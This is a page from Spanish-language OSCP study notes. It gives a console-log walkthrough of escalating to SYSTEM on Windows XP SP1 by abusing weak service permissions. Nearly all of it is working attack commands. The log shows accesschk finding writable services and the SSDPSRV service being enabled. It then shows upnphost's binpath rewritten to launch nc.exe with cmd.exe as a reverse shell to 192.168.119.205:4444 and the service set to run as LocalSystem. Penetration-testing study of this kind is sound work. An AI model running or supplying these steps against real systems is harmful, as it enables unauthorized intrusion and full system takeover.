OSCP Notes
  • OSCP Cheatsheet
  • Sistema de ficheros del OS
    • File Transfers Linux
    • File Transfers Windows
  • Web Attacks
    • Web Enumeration
    • SQL Injection
    • CGI
    • CMS
  • DATABASES
    • MSSQL
    • MYSQL
  • Services Enumeration
    • Trucos Generales
    • POP3 - 110
    • SMB - (445-139)
    • DNS
    • NFS - 2049
    • SMTP - 25
    • TFTP - 69
    • SNMP - (161-162-10161-10162)
  • Privilege Escalation
    • Information Gathering - EscPriv
    • Windows Privilege Escalation
      • MANUAL - Windows PrivEsc
      • Bypass UAC
    • Linux Privilege Escalation
  • Password Attacks
    • Hash Identification
    • Brute Force
    • Pass in the Hash
    • Password Cracking
  • Port Redirection and Tunneling
    • Port Forwarding
    • SSH Tunneling
      • SSH Local Port Forwarding
      • SSH Remote Port Forwarding
      • SSH Dynamic Port Forwarding
  • Active Directory Attacks
    • AD Enumeration
    • AD Authentication
    • AD Lateral Movement
    • AD Vulnerabilidades actuales
    • Powershell Empire
  • Buffer Overflow
    • Linux
    • Windows
      • Spiking
      • Fuzzing
      • Finding the Offset
      • Overwriting The EIP
      • Finding the Bad Charaters
      • Finding The Right Module
      • Generating Shellcode and Gaining Shell
  • Client-Side Attacks
    • Windows Office Macros
  • Post-explotacion
    • Trucos Generales
      • Links Utiles
    • Windows
      • Mimikatz
      • Writeup Esc WinXP SP1 with services
      • POWERSHELL
  • CRTP
    • PowerView
    • Notas Generales
Con tecnología de GitBook
En esta página
  1. Post-explotacion
  2. Windows

Writeup Esc WinXP SP1 with services

AnteriorMimikatzSiguientePOWERSHELL

Última actualización hace 2 años

C:\Inetpub\wwwroot>accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
RW SSDPSRV
        SERVICE_ALL_ACCESS
RW upnphost
        SERVICE_ALL_ACCESS

C:\Inetpub\wwwroot>accesschk.exe /accepteula -ucqv SSDPSRV
accesschk.exe /accepteula -ucqv SSDPSRV
SSDPSRV
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\Authenticated Users
        SERVICE_ALL_ACCESS
  RW BUILTIN\Power Users
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\LOCAL SERVICE
        SERVICE_ALL_ACCESS

C:\Inetpub\wwwroot>accesschk.exe /accepteula -ucqv upnphost
accesschk.exe /accepteula -ucqv upnphost
upnphost
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\Authenticated Users
        SERVICE_ALL_ACCESS
  RW BUILTIN\Power Users
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\LOCAL SERVICE
        SERVICE_ALL_ACCESS

C:\Inetpub\wwwroot>sc qc upnphost
sc qc upnphost
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: upnphost
        TYPE               : 20  WIN32_SHARE_PROCESS 
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\WINDOWS\System32\svchost.exe -k LocalService  
        LOAD_ORDER_GROUP   :   
        TAG                : 0  
        DISPLAY_NAME       : Universal Plug and Play Device Host  
        DEPENDENCIES       : SSDPSRV  
        SERVICE_START_NAME : NT AUTHORITY\LocalService  

C:\Inetpub\wwwroot>sc qc SSDPSRV
sc qc SSDPSRV
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: SSDPSRV
        TYPE               : 20  WIN32_SHARE_PROCESS 
        START_TYPE         : 4   DISABLED
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\WINDOWS\System32\svchost.exe -k LocalService  
        LOAD_ORDER_GROUP   :   
        TAG                : 0  
        DISPLAY_NAME       : SSDP Discovery Service  
        DEPENDENCIES       :   
        SERVICE_START_NAME : NT AUTHORITY\LocalService  

C:\Inetpub\wwwroot>sc query SSDPSRV
sc query SSDPSRV

SERVICE_NAME: SSDPSRV
        TYPE               : 20  WIN32_SHARE_PROCESS 
        STATE              : 1  STOPPED 
                                (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 1077       (0x435)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

C:\Inetpub\wwwroot>sc query upnphost
sc query upnphost

SERVICE_NAME: upnphost
        TYPE               : 20  WIN32_SHARE_PROCESS 
        STATE              : 1  STOPPED 
                                (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 1077       (0x435)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

C:\Inetpub\wwwroot>net start SSDPSRV
net start SSDPSRV
System error 1058 has occurred.

The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.


C:\Inetpub\wwwroot>sc config SSDPSRV start= auto
sc config SSDPSRV start= auto
[SC] ChangeServiceConfig SUCCESS

C:\Inetpub\wwwroot>sc qc SSDPSRV
sc qc SSDPSRV
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: SSDPSRV
        TYPE               : 20  WIN32_SHARE_PROCESS 
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\WINDOWS\System32\svchost.exe -k LocalService  
        LOAD_ORDER_GROUP   :   
        TAG                : 0  
        DISPLAY_NAME       : SSDP Discovery Service  
        DEPENDENCIES       :   
        SERVICE_START_NAME : NT AUTHORITY\LocalService  

C:\Inetpub\wwwroot>net start SSDPSRV
net start SSDPSRV
The SSDP Discovery Service service is starting.
The SSDP Discovery Service service was started successfully.


C:\Inetpub\wwwroot>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 50C3-3741

 Directory of C:\Inetpub\wwwroot

02/04/2022  08:37 PM    <DIR>          .
02/04/2022  08:37 PM    <DIR>          ..
02/04/2022  08:37 PM           222,592 accesschk.exe
02/04/2022  08:34 PM             1,221 gerh.asp
09/19/2008  06:06 PM                 7 index.htm
02/04/2022  08:35 PM            59,392 nc.exe
02/04/2022  08:36 PM                 0 radE4009.tmp
02/04/2022  08:36 PM            66,560 whoami.exe
               6 File(s)        349,772 bytes
               2 Dir(s)   1,630,248,960 bytes free

C:\Inetpub\wwwroot>sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe -nv 192.168.119.205 4444 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe -nv 192.168.119.205 4444 -e C:\WINDOWS\System32\cmd.exe"
[SC] ChangeServiceConfig SUCCESS

C:\Inetpub\wwwroot>sc config upnphost obj= ".\LocalSystem" password= ""
sc config upnphost obj= ".\LocalSystem" password= ""
[SC] ChangeServiceConfig SUCCESS

C:\Inetpub\wwwroot>sc qc upnphost
sc qc upnphost
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: upnphost
        TYPE               : 20  WIN32_SHARE_PROCESS 
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Inetpub\wwwroot\nc.exe -nv 192.168.119.205 4444 -e C:\WINDOWS\System32\cmd.exe  
        LOAD_ORDER_GROUP   :   
        TAG                : 0  
        DISPLAY_NAME       : Universal Plug and Play Device Host  
        DEPENDENCIES       : SSDPSRV  
        SERVICE_START_NAME : LocalSystem  

C:\Inetpub\wwwroot>net start upnphost

LogoWindows XP SP0/SP1 Privilege Escalation to System Tutorial